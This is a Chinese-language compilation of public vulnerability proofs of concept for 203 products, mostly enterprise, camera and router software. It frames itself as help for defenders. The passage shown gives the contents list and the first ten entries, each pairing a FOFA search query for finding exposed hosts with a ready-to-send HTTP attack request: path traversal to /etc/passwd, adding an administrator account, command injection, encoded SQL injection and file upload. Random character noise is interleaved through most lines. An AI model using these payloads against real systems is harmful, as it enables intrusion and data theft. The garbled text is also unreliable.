互联网公开漏洞整理202309-202406
8 u8 M0 Q3 Z: ^1 Z& K道一安全 2024-06-05 07:41 北京
) \0 ~& \/ o5 O4 c以下文章来源于网络安全新视界 ,作者网络安全新视界
0 P2 C& w% R9 G! U- u/ L
5 D6 q. H- a; J4 f# ]0 E发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
: H( v* h+ e& v6 t1 I, Q; G1 m$ u/ n
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
% t9 k5 I, _( o8 _
9 { p8 l/ G8 r" g2 ]: S, B2 t V安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
8 k- f' _# R; y |4 _7 A. D' K- N! p/ k" P+ \* |# r1 T( R% D
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。1 b6 c5 s. _. v; r. B. p& b: F3 V
1 a" l' p& j. Y# ^9 b' I+ Q8 U: ^& h合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。! V8 K4 h8 L: X7 P0 y1 S+ f. q
. B$ e$ }' u; r6 V2 g
5 V9 q" O/ x# W+ s9 n声明
2 ~1 Q3 @+ q$ K0 p+ r5 G2 T% R$ G, O* i! M2 J; Z% g
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
/ `- O3 T) n1 m' P/ |" O1 [8 j2 {
2 t: U- J; T% ?* ^0 E* L2 T1 m Y有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。$ e2 O) E# S/ E. g; n4 C/ U; s
+ Y' ~5 J7 y1 e; N% R: Y% P
) t& @: V% c* B
5 l; N3 z- H- q
目录
! I. A2 [: q9 ^0 }7 {5 I8 O: }
% S2 s' i8 r6 t5 t; I010 ^5 A0 G7 o/ N
. L5 e9 ]" m2 ^1 H( X; a
1. StarRocks MPP数据库未授权访问. Q$ ^! E5 n5 u8 \# B
2. Casdoor系统static任意文件读取
7 F$ y! S0 O: y3. EasyCVR智能边缘网关 userlist 信息泄漏
" s! g8 e+ u. I$ a5 g4. EasyCVR视频管理平台存在任意用户添加
; c' d7 n+ |# S5. NUUO NVR 视频存储管理设备远程命令执行5 C b. N# f* y; B0 q! h6 D4 h
6. 深信服 NGAF 任意文件读取, _! F" j" Y' n
7. 鸿运主动安全监控云平台任意文件下载
( E1 L& Y, E1 i2 r8. 斐讯 Phicomm 路由器RCE
, F9 |4 D: W4 ]% U( L9. 稻壳CMS keyword 未授权SQL注入8 p: x8 U W1 a" {) O+ J
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
6 \: T' r; r+ D; D* R! J11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入& U, V* ]3 P% t* Q) P4 ?5 B; A
12. Jorani < 1.0.2 远程命令执行
1 R+ U( y% Z! @% z8 C13. 红帆iOffice ioFileDown任意文件读取; p Y* ]( u' ]
14. 华夏ERP(jshERP)敏感信息泄露
3 {, f9 u: n4 _; C, d$ ]) R15. 华夏ERP getAllList信息泄露
6 e X& x4 P! F/ }16. 红帆HFOffice医微云SQL注入& [# m! ^2 s2 E* V7 s% P2 i
17. 大华 DSS itcBulletin SQL 注入+ L3 z* [+ S$ w8 B$ }# Q
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露0 N. o6 {7 W. {% K- v
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
' C* [/ D d6 j; k% u, r: }' g20. 大华ICC智能物联综合管理平台任意文件读取
/ R1 B* Z; Q2 \. P @+ J, l21. 大华ICC智能物联综合管理平台random远程代码执行2 ]* V- ]8 z9 k% V3 \+ E/ h
22. 大华ICC智能物联综合管理平台 log4j远程代码执行1 U$ z0 U0 ~1 Q5 ~, X+ U
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
2 X2 R, x3 A! E24. 用友NC 6.5 accept.jsp任意文件上传
" P9 G+ b/ V* x( G8 t25. 用友NC registerServlet JNDI 远程代码执行7 u- g# ]4 r. t
26. 用友NC linkVoucher SQL注入* p$ D( N3 I, q% x
27. 用友 NC showcontent SQL注入* ~8 ?& \+ @: ~" v+ T9 q5 w- S; ~3 m
28. 用友NC grouptemplet 任意文件上传
, Q8 ^1 P9 E1 o* l6 S# Z29. 用友NC down/bill SQL注入
; L* R5 q# Y2 z$ t30. 用友NC importPml SQL注入" @( m% K E8 K5 E" j
31. 用友NC runStateServlet SQL注入
# M* v7 c o1 s+ I( C" m32. 用友NC complainbilldetail SQL注入- ^1 C1 H) M3 U( w. v
33. 用友NC downTax/download SQL注入
! V8 \" `6 T( K0 `# t& X34. 用友NC warningDetailInfo接口SQL注入
( t( R- p! o% k3 [8 _35. 用友NC-Cloud importhttpscer任意文件上传- c/ J6 x) _3 L# b. r4 H
36. 用友NC-Cloud soapFormat XXE5 [ e) _7 j; V: w
37. 用友NC-Cloud IUpdateService XXE# J F* I6 U- B$ G) ^" h
38. 用友U8 Cloud smartweb2.RPC.d XXE
5 y# n9 f( _6 i39. 用友U8 Cloud RegisterServlet SQL注入
; L* a. ~/ q" \) y40. 用友U8-Cloud XChangeServlet XXE
% ~# E) ^. _6 L9 E4 I8 M41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
3 L2 `6 ^ A: T, B+ s: M" f4 W42. 用友GRP-U8 SmartUpload01 文件上传
{. \. W0 w. T3 c43. 用友GRP-U8 userInfoWeb SQL注入致RCE2 x" f+ A* t0 D5 z9 C
44. 用友GRP-U8 bx_dj_check.jsp SQL注入 H" u1 _' i1 E3 X, v/ s
45. 用友GRP-U8 ufgovbank XXE: i+ \' t) {- x. d
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
8 T' w+ a8 p3 ^, n H47. 用友GRP A++Cloud 政府财务云 任意文件读取
, }; ~: w. }) S2 S3 r* P5 U" l48. 用友U8 CRM swfupload 任意文件上传
$ K0 J, Q- _ X: Q+ T* o7 m- W49. 用友U8 CRM系统uploadfile.php接口任意文件上传! _" q2 n8 s p9 r, d+ @
50. QDocs Smart School 6.4.1 filterRecords SQL注入
; p( Z- i" K! h4 }1 k51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入. `% l. ?2 g2 M: `: u! {
52. 泛微E-Office json_common.php sql注入% a, v$ \' [0 u
53. 迪普 DPTech VPN Service 任意文件上传
0 b/ |6 o( K; g& P/ ?8 X54. 畅捷通T+ getstorewarehousebystore 远程代码执行+ J7 d2 c Q/ n% l" P! d
55. 畅捷通T+ getdecallusers信息泄露
7 P$ M/ c5 c! p u* N56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
' m* v$ D1 I- f4 Z7 R+ t57. 畅捷通T+ keyEdit.aspx SQL注入% \& V) _( D& K- ?. ~
58. 畅捷通T+ KeyInfoList.aspx sql注入, Y/ @: B6 e2 n+ K
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行1 d' q/ f& q4 w1 N3 m
60. 百卓Smart管理平台 importexport.php SQL注入0 ] N7 b4 N; d8 x$ v h& I M
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传/ i- o% d; I; t5 a( l
62. IP-guard WebServer 远程命令执行 _8 y$ P7 w) _
63. IP-guard WebServer任意文件读取) |$ }0 I Q4 h7 K, ?" `
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
# R; H" z4 E3 W6 p65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
. J& N9 U1 Z( i6 I. O+ x66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入" a! C' i2 k* b: W, g
67. 万户ezOFFICE wpsservlet任意文件上传/ D, J7 Q, M/ c+ p
68. 万户ezOFFICE wf_printnum.jsp SQL注入( g* A3 h5 f/ m$ ]0 F
69. 万户 ezOFFICE contract_gd.jsp SQL注入
6 J ?4 e8 L8 N! _70. 万户ezEIP success 命令执行
! J1 H+ _( F- q* s* g1 p4 T4 I1 [3 z71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
% v3 P1 K) d# j/ G72. 致远OA getAjaxDataServlet XXE& ^" u; Q1 Q1 v6 Q; ~# R/ U$ Q" _
73. GeoServer wms远程代码执行' q% k# ?1 J" j7 P% Y
74. 致远M3-server 6_1sp1 反序列化RCE
- ^+ j I$ t- m( K$ H8 T75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
) I: n* c+ |1 ]2 U, b76. 新开普掌上校园服务管理平台service.action远程命令执行
* T |& T2 W. P: n# c77. F22服装管理软件系统UploadHandler.ashx任意文件上传
1 A% w( ]2 w* n! K ~/ G7 x. H H78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传. S. L, G$ J7 j. x7 ]! k! Z
79. BYTEVALUE 百为流控路由器远程命令执行
5 o, e% O( v9 q7 E80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传7 T! }4 G' H6 W
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露) C' f* J: W* D# A) A6 }
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行8 F( t/ K! z. Y% z4 \) L# _ k
83. JeecgBoot testConnection 远程命令执行2 U# O0 {. I) h" Q
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入3 [: ]( E1 _1 Z+ M# M w
85. SysAid On-premise< 23.3.36远程代码执行9 N# {/ B4 X! U1 J3 Y" Y, R' ~
86. 日本tosei自助洗衣机RCE
0 b( P1 U: o7 W0 q w" O/ Z87. 安恒明御安全网关aaa_local_web_preview文件上传& ]( |9 c3 B) q" }/ f
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
+ C2 |3 f, F; S) z4 I( A" E- \9 i7 c89. 致远互联FE协作办公平台editflow_manager存在sql注入
9 S' J% _1 k9 M* G* W/ E- J90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
. q% U* `& N# Q! U# r+ P, I91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
- Z4 [2 M" Y3 D92. 海康威视运行管理中心session命令执行
2 B5 Z5 w0 x6 ?6 n8 U7 H( X5 `93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
0 ^& ^( `! `2 U+ X94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
7 M7 h* A. _& m) b( [$ Z95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
6 J% d* D: y5 A, e( Q8 {96. Apache OFBiz 18.12.11 groovy 远程代码执行
$ _4 d. m& d* V9 Y97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
$ T+ P0 A( O* b4 B6 o98. SpiderFlow爬虫平台远程命令执行
* `/ s. f! r" r0 W! C2 K- j! l99. Ncast盈可视高清智能录播系统busiFacade RCE
% c, e# P1 c# r# D) z0 X6 Z100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传; ~+ D) D3 ~0 \; y i" m( B
101. ivanti policy secure-22.6命令注入5 z% J: |# `# Y' H8 Q
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
- x7 m6 r5 i# r1 U/ ^ q) Z5 S+ j103. Ivanti Pulse Connect Secure VPN XXE
' ^7 Q+ y. j3 C. E104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
( K. Z$ U" n5 Y6 V9 H/ }105. SpringBlade v3.2.0 export-user SQL 注入3 H% z8 A0 V" A; i) q- p& |# j
106. SpringBlade dict-biz/list SQL 注入- E; @- f1 I6 G2 g1 _
107. SpringBlade tenant/list SQL 注入" R8 n3 n: c2 R p- O+ g! d( E
108. D-Tale 3.9.0 SSRF
- ~6 K4 H" h* Z: i109. Jenkins CLI 任意文件读取% M! R6 }5 \4 V! Y
110. Goanywhere MFT 未授权创建管理员/ W( U* o, X9 I4 ?; Q! c
111. WordPress Plugin HTML5 Video Player SQL注入
- W* ^/ Z7 Y$ V+ l! a! \+ z112. WordPress Plugin NotificationX SQL 注入, X: z" E/ U- K( |8 l8 V1 I
113. WordPress Automatic 插件任意文件下载和SSRF" S7 ^' [# ^3 r1 v% x
114. WordPress MasterStudy LMS插件 SQL注入
2 u/ ]+ A- t, s( P115. WordPress Bricks Builder <= 1.9.6 RCE
9 ~* T ^( U4 v) J& q9 O1 u5 K116. wordpress js-support-ticket文件上传
4 Y; t8 D' t! L8 s117. WordPress LayerSlider插件SQL注入
! U* P, B: w9 [' G/ D+ p118. 北京百绰智能S210管理平台uploadfile.php任意文件上传3 d7 E3 Q/ b, A" o
119. 北京百绰智能S20后台sysmanageajax.php sql注入
$ T4 i0 b4 G, l1 Z3 |/ [0 r) T120. 北京百绰智能S40管理平台导入web.php任意文件上传
- q/ s! A; n1 H5 x& C3 H121. 北京百绰智能S42管理平台userattestation.php任意文件上传
+ P/ ~4 V' h* B9 {& _! M6 j122. 北京百绰智能s200管理平台/importexport.php sql注入
7 [. F7 b4 {. x0 n/ V* M2 {- T2 ^123. Atlassian Confluence 模板注入代码执行
! {5 r4 v. i1 d- }& p6 u124. 湖南建研工程质量检测系统任意文件上传
+ o9 A6 H. a0 g9 h0 d( J125. ConnectWise ScreenConnect身份验证绕过
; k6 ~5 V) W; |0 z7 a2 w1 a126. Aiohttp 路径遍历
6 Y& b6 M. y5 a$ ^2 f3 l127. 广联达Linkworks DataExchange.ashx XXE! A- ?0 O/ i v. X+ h. n. j
128. Adobe ColdFusion 反序列化
9 n9 m4 l' [$ G+ ~& g129. Adobe ColdFusion 任意文件读取" K7 P; _( A; U7 M
130. Laykefu客服系统任意文件上传, N" s$ l6 ~. c5 b1 w
131. Mini-Tmall <=20231017 SQL注入" F1 q7 r. q6 S, _+ O
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过6 o" H: C( T& x
133. H5 云商城 file.php 文件上传
, z5 Y$ t. G2 R; S134. 网康NS-ASG应用安全网关index.php sql注入1 Z& P* S# `7 E0 d5 n1 C
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
1 D9 {1 n5 m9 ]8 p8 K7 B136. NextChat cors SSRF, r- |# D* [) B2 Y
137. 福建科立迅通信指挥调度平台down_file.php sql注入# e5 v- _& ], \! O- i7 Z1 D
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
7 u; T# N$ }) w) C. J0 @5 s139. 福建科立讯通信指挥调度平台editemedia.php sql注入
2 p1 n6 Q; A/ ^ a% D2 c6 b% r, x140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入+ H$ [7 j& j2 z; R. j( b
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入8 e/ m) i8 ~' {" {
142. CMSV6车辆监控平台系统中存在弱密码" a# W+ C O7 W4 O
143. Netis WF2780 v2.1.40144 远程命令执行& `' v8 t) Q' z. W; O8 I- X6 i1 d
144. D-Link nas_sharing.cgi 命令注入: D0 Y$ ^$ I! Z, M
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入* S. j$ ~; ?5 \( j+ K) L. x
146. MajorDoMo thumb.php 未授权远程代码执行: g) P; y k! A8 B* s& Q
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
/ v; F7 A, M% p: G& N148. CrushFTP 认证绕过模板注入
5 V9 x; k1 u6 ~: F149. AJ-Report开源数据大屏存在远程命令执行/ F- D4 v: j+ h" p8 K
150. AJ-Report 1.4.0 认证绕过与远程代码执行
$ K! S: K+ G! K- L0 q+ T* L151. AJ-Report 1.4.1 pageList sql注入
3 W6 n N8 ?- F- x: ~152. Progress Kemp LoadMaster 远程命令执行
. }4 ^5 w# W3 v7 q- L! r153. gradio任意文件读取) w2 I" U+ F6 |
154. 天维尔消防救援作战调度平台 SQL注入; i1 p5 A5 n* z* I. J( d
155. 六零导航页 file.php 任意文件上传
; P) x; W; l0 C" l% D c156. TBK DVR-4104/DVR-4216 操作系统命令注入" C5 n4 _. i, c9 U
157. 美特CRM upload.jsp 任意文件上传
9 @6 \ q1 ~2 u# ]158. Mura-CMS-processAsyncObject存在SQL注入
2 l7 L) s" z- M$ S3 d+ G# n159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传8 `; B2 k0 Z9 w
160. Sonatype Nexus Repository 3目录遍历与文件读取& G4 M6 R* J- h: a5 L
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传/ x7 t6 i+ _) l; |8 X Q* Y
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传! {% }6 z2 L/ U, O5 Q; Y
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
1 ~% x8 U4 B$ ]& O0 j% \164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
( L1 x$ I: l8 J+ q4 C9 O165. OrangeHRM 3.3.3 SQL 注入
* W1 W5 F! [/ u8 r4 E Q8 u166. 中成科信票务管理平台SeatMapHandler SQL注入6 Y7 K* F( @8 E, O4 o& r
167. 精益价值管理系统 DownLoad.aspx任意文件读取6 C, k; }' j* f% `" M
168. 宏景EHR OutputCode 任意文件读取( {9 b9 o; `2 c6 ~6 W4 c# {( r9 {
169. 宏景EHR downlawbase SQL注入8 U R! d$ P W7 @6 x
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
- J, ?! h. H% G3 M2 z/ Q171. 通天星CMSV6车载定位监控平台 SQL注入
0 r, _/ y5 m( W* G/ k A( \/ M172. DT-高清车牌识别摄像机任意文件读取7 K# K i( {6 z! Y* E5 B; x8 O
173. Check Point 安全网关任意文件读取
+ w/ T6 S! E1 ]- A; F: C; X: ]7 Y174. 金和OA C6 FileDownLoad.aspx 任意文件读取
. a3 ^4 L- C' t* l5 i175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入, }! T [9 i2 n% w
176. 电信网关配置管理系统 rewrite.php 文件上传
5 r) \3 q) L) ?' H177. H3C路由器敏感信息泄露1 z. J) x% X! U3 n" X% T3 d
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
! [0 b; U' h. w- H, T& w) K179. 建文工程管理系统存在任意文件读取4 a. Y. Z, f$ s& r8 c1 K
180. 帮管客 CRM jiliyu SQL注入
; L) e/ q6 E$ l2 u181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
5 P6 U% y6 ~# H/ B2 D5 B. S182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建- {1 x- [# j' g; } s+ u
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入8 q/ j; u( j! u) u
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加/ e7 w8 U' p- N% o- `/ s
185. 瑞友天翼应用虚拟化系统SQL注入& \3 V+ X* a6 W+ f/ U$ |
186. F-logic DataCube3 SQL注入( w- \) M, i! H) ^ D
187. Mura CMS processAsyncObject SQL注入7 n5 @/ R3 R N# J8 ]- K+ b+ h
188. 叁体-佳会视频会议 attachment 任意文件读取
) O9 x( `; }; ?7 O3 L189. 蓝网科技临床浏览系统 deleteStudy SQL注入$ V5 ~. g5 d/ d5 N% A! Y" m
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
$ e) ~5 @+ k3 N( X- h191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
1 q* n2 [% g% ?& {) w$ V8 i8 {0 ~192. 富通天下外贸ERP UploadEmailAttr 任意文件上传$ ^' Z8 b. T" X/ N% E
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行2 e1 f4 t/ [% `8 {7 f& n' E( ?
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
3 m3 q, I- @3 Q9 e% h4 E6 G195. 飞鱼星上网行为管理系统 send_order.cgi命令执行8 E& l3 x1 }2 l2 `. N& Z
196. 河南省风速科技统一认证平台密码重置" f8 B- D* H, R& H7 f
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入- P. N5 |; ]- v( o& t: V, t* w
198. 阿里云盘 WebDAV 命令注入; f( ]- S* u( `" K! I6 [7 u: v
199. cockpit系统assetsmanager_upload接口 文件上传
( a( `4 R# \' o200. SeaCMS海洋影视管理系统dmku SQL注入) {3 D% |' s- ~- q, c) t- F
201. 方正全媒体新闻采编系统 binary SQL注入0 R0 d& T, T" e# t5 N2 R6 S+ M
202. 微擎系统 AccountEdit任意文件上传- J' u+ k3 Q% `5 F. u( U
203. 红海云EHR PtFjk 文件上传
2 ^% k H9 ~, G& p0 \! g* b: g: T5 k4 \- x5 L8 c
POC列表
* P0 C2 R3 P0 @: O3 v1 @( T1 e5 p0 N) \/ j) W7 j
02
# K- _, p' Y0 [% o, x, q7 K1 l
7 d* k# t$ q* Y# A1. StarRocks MPP数据库未授权访问
1 V# e) k5 P0 Q5 mFOFA :title="StarRocks"$ y: C! I8 `1 l' I8 R& N
GET /mem_tracker HTTP/1.1; q: w! j2 w2 ]$ B9 R- q
Host: URL
$ i, ]) u8 k/ P/ D( i" y% P' E
e, j; Y$ X$ u' g# Y! L
! |0 m) i3 i- K. n2. Casdoor系统static任意文件读取
- p: `1 H. g2 _FOFA :title="Casdoor"
6 f/ n1 M$ x$ j' X0 ~GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1) _( r% V) k$ Y6 P! n
Host: xx.xx.xx.xx:9999
+ g( \0 e9 d; c3 SUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 |7 e; I6 J6 j0 }Connection: close
1 M6 o( A7 Q" R Q' J' ]Accept: */*
* J( N1 z2 |4 O' E w5 GAccept-Language: en! H( s! }# n g q T8 `& ^
Accept-Encoding: gzip
) H: ~. Q( p/ F8 K) d' \
4 I4 i: V% P/ k+ b% I, D: q% m
2 U7 n. t6 A5 o- O6 S9 H. s/ u3. EasyCVR智能边缘网关 userlist 信息泄漏
# Y- Q# ?; p3 h/ [$ G/ {: DFOFA :title="EasyCVR"
6 C6 I& p( W7 B- t8 ~6 N! ^; N( ^GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1 y! W. e9 j& _
Host: xx.xx.xx.xx0 [; C# M# l) D; W6 Z) n2 W# U
4 m5 Y3 g8 q3 P c8 C; ^% c6 U
5 m* a+ K* d) ^% ~1 ~+ Y4. EasyCVR视频管理平台存在任意用户添加
0 ?; ?, E* k0 d7 OFOFA :title="EasyCVR"
; R& c4 v8 k# P& m) l7 ^' ^) u4 C
[8 z2 p7 C1 a; b& l, Z7 Wpassword更改为自己的密码md5
: [4 H3 i1 H G, OPOST /api/v1/adduser HTTP/1.1
* K% L9 B$ `- f, |) y+ KHost: your-ip
% g# I0 D) v' o) q! mContent-Type: application/x-www-form-urlencoded; charset=UTF-8$ A$ n1 r9 s1 A+ c' }2 A8 S
7 y0 m: z' j0 I
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
" Q5 A/ `6 [5 E6 X
3 x. B, z h, q2 x) B- C- x6 O- X4 @( Y6 G
5. NUUO NVR 视频存储管理设备远程命令执行8 Y' V. m+ w( i, T t9 ?8 a" `
FOFA:title="Network Video Recorder Login"
) p6 j/ f) ^# e* r2 b% c5 |GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
( i; j" ~( S" {. Y: [+ C8 dHost: xx.xx.xx.xx
; t0 P \/ i2 f* F8 X) N; B$ s" h5 P) J' w5 F( w9 n( V
o' l/ W% l1 T+ m& W5 N# {8 w! o6. 深信服 NGAF 任意文件读取
% s- o2 d1 K9 PFOFA:title="SANGFOR | NGAF"% ^1 A: M& h7 m7 \# M) q
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1$ G# n! F( \7 S/ _ Z$ G) D
Host:
" A- h" T( r+ w1 c
4 h1 t3 _8 O- N8 D; n1 \' z& q: x! J# G$ A% |5 O
7. 鸿运主动安全监控云平台任意文件下载# h; h- L/ c1 A( e& Y& O. j8 T
FOFA:body="./open/webApi.html"
( ] T) T1 p7 D! @+ xGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1( O! ~$ b: I- u0 g9 v
Host:1 C2 j# d/ Z" q0 | C6 Q8 f
G( E9 \: {7 @5 a: y" M8 t
1 {* H* v9 @& w! m- `) U8 a8. 斐讯 Phicomm 路由器RCE
2 v; J5 Q& J3 t G& d! w# sFOFA:icon_hash="-1344736688"% U0 a. p& m# S2 {' O# I
默认账号admin登录后台后,执行操作
V- m; L- o u Q/ A; |POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.16 l+ ]/ B/ _- K" ^. z3 s+ g! a6 `
Host: x.x.x.x
( ~! h$ r% y) @3 F6 b" \Cookie: sysauth=第一步登录获取的cookie
1 a! z2 ?, s5 d" Y3 jContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
$ S- w4 E% L0 n8 Y0 kUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
, _% C) ]) F' [/ E9 L: M/ W- X/ j% J
------WebKitFormBoundaryxbgjoytz& \3 E# X* T7 }
Content-Disposition: form-data; name="wifiRebootEnablestatus"' n2 c' C$ l$ e/ |- ]" U) @
& X6 F, M6 S8 a; \6 w
%s
" i7 H$ t: y( y2 X/ G------WebKitFormBoundaryxbgjoytz
4 g8 A3 X. n8 [" I$ k2 a% uContent-Disposition: form-data; name="wifiRebootrange"
. I* v, Q# r- [; k/ v% P1 |
6 f* i: r- q' k( }/ z12:00; id;: H* {6 f: @( `" Z- E! z
------WebKitFormBoundaryxbgjoytz
6 q* ]. D, x! |7 y2 i L0 vContent-Disposition: form-data; name="wifiRebootendrange"
7 N7 j6 h7 \3 O) {/ ]
" {4 L2 g* |3 u0 _+ y, U9 j' ~; a& T%s:/ L# k) s$ J: w; v+ e7 t- J: ~" A" Q: P
------WebKitFormBoundaryxbgjoytz! d) U. N/ l4 V9 u2 Q# S
Content-Disposition: form-data; name="cururl2"; R W- q5 ]/ U- c5 }& h& ]
1 U0 p9 P- \; Z# Q! _
" e1 t! f& y& S/ v------WebKitFormBoundaryxbgjoytz--: v* L6 |- D# f$ E
% B6 f% Y& C& Y. r% p/ G
, I7 n0 n h8 q+ m9. 稻壳CMS keyword 未授权SQL注入
{- `+ R' j, p9 X* m$ a# A7 BFOFA:app="Doccms"/ x' m: K0 E% B
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
, n+ O4 q( ^+ h* V, b$ F8 j5 h& CHost: x.x.x.x
, K( Y5 i# C1 @8 p3 @1 h+ @
) y7 V9 o% a* o5 S
' k" g2 Q2 n: k0 U" mpayload为下列语句的二次Url编码% |( S6 \9 i H& {5 Y
: J7 I4 F& i; x( z1 m$ N. Z8 }) p' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#. _3 s4 L( g3 O& M0 [. N9 g) q
$ ]5 Z- q& a/ W! X: v' K& y- F10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
" d+ I8 T0 d+ i3 q- T: N9 w# CFOFA:icon_hash="953405444", X( M% Y; X) p9 j" W7 @, n1 e3 `2 H1 H
) q6 z7 z& w9 z5 E. R8 X
文件上传后响应中包含上传文件的路径+ m: ]0 F& [! X' C
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
8 G+ _! B- W6 W% _5 s j7 F: ]Host: x.x.x.x:xx
g; W* x2 a- \/ X/ L% @: tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
. H8 S3 T; W3 Y& YContent-Length: 197
C4 I' R+ n6 \) BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
, V/ I2 g& O+ _, C. j) H$ n% QAccept-Encoding: gzip, deflate
7 q: r% f4 @+ `2 ~. sAccept-Language: zh-CN,zh;q=0.93 I5 t+ P# J B/ C% o5 g% }- H
Connection: close9 D0 `, \* H4 _& F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu: g! i: X) V4 ?3 K9 ^4 l
9 S) x& t; u# B! N9 q5 r- C. s------WebKitFormBoundaryxdgaqmqu
* i% l* g/ @ }: g6 X/ s5 YContent-Disposition: form-data; name="file"filename="icfitnya.txt"
9 H" }( D8 ~; X9 G( w- tContent-Type: text/html% k$ M$ i3 u) X) D9 g/ m& d1 u4 M
* `7 B: l% l/ x5 F
jmnqjfdsupxgfidopeixbgsxbf
2 M/ H! ?4 h4 u% f------WebKitFormBoundaryxdgaqmqu--
; t5 t9 ~; k6 q
6 ?2 u6 t3 r# T- m7 p! j. {. x5 w0 y) w0 N+ Z8 V, t! j
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入/ x) S, R2 {; R. h4 }
